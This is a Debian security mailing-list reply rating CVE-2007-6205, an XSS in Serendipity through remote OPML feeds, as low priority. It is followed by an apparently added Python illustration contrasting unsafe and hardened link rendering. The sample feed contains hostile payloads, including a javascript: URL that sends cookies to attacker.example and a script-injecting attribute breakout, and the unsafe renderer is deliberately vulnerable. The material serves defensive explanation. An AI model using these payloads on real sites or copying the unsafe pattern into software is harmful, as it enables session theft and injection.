On Tuesday 11 December 2007 09:37, nion@alioth.debian.org wrote:
> Log:
> CVE-2007-6205 fixed in serendipity 1.2.1-1
> CVE-2007-6205
> RESERVED
> + - serendipity 1.2.1-1 (low)

This issue is: XSS through remote RSS feeds.

I would rate it as unimportant myself: it requires using this specific plugin, only with an OPML-format feed, and then the remote maintainer of that feed needs to be interested in getting your password, and will need to put malicious script into the url-parameter of that feed (breaking the feed for everyone else, so it's noticeable and traceable who did it).

To me this scenario sounds highly unlikely. I propose to mark it as no-dsa for stable, and even to lower the severity to unimportant.

Comments?

Thijs
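An added illustration of the attack shape Thijs describes (a hostile value in the url attribute of a remote OPML feed landing in the page that aggregates it). This is not Serendipity's plugin code and makes no claim about how that plugin was actually written; the OPML document, the renderer, and the function names are constructed here for the example. It shows the unsafe rendering pattern next to a hardened one that both checks the URL scheme and HTML-escapes the attribute, since either check alone leaves one of the two hostile entries exploitable.

```python
import html
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

# Constructed OPML feed (not a real feed). The first outline is benign, the
# second smuggles a javascript: URL, the third breaks out of the href attribute
# with a quote and injects a script element once the XML entities are decoded.
SAMPLE_OPML = """<?xml version="1.0"?>
<opml version="1.1">
  <body>
    <outline text="Planet Debian" url="http://planet.debian.org/rss20.xml"/>
    <outline text="Evil" url="javascript:document.location='http://attacker.example/?c='+document.cookie"/>
    <outline text="Quoted" url="http://example.org/feed.xml&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;"/>
  </body>
</opml>
"""

ALLOWED_SCHEMES = {"http", "https"}


def outlines(opml_text):
    """Return (text, url) pairs for every <outline> that carries a url attribute."""
    root = ET.fromstring(opml_text)
    return [(o.get("text", ""), o.get("url", ""))
            for o in root.iter("outline") if o.get("url")]


def render_unsafe(opml_text):
    """Hypothetical vulnerable renderer: attribute values pasted straight into HTML."""
    return "\n".join(f'<a href="{url}">{text}</a>' for text, url in outlines(opml_text))


def safe_url(url):
    """Accept only absolute http(s) URLs with a host; reject javascript:, data:, etc."""
    parts = urlsplit(url.strip())
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not parts.netloc:
        return None
    return url


def render_safe(opml_text):
    """Hardened renderer: scheme allowlist plus HTML attribute escaping."""
    out = []
    for text, url in outlines(opml_text):
        checked = safe_url(url)
        if checked is None:
            continue  # drop entries whose URL is not a plain http(s) link
        # quote=True escapes both " and ' so the value cannot leave the attribute
        out.append(f'<a href="{html.escape(checked, quote=True)}">{html.escape(text)}</a>')
    return "\n".join(out)


if __name__ == "__main__":
    print("--- unsafe ---")
    print(render_unsafe(SAMPLE_OPML))
    print("--- safe ---")
    print(render_safe(SAMPLE_OPML))
```

Note that the third entry passes the scheme check (it really is an http URL up to the first quote), so a scheme allowlist on its own is not enough; the attribute escaping is what neutralises it. Conversely the javascript: entry survives escaping unchanged, so escaping alone would still ship a clickable script link. Both checks are needed.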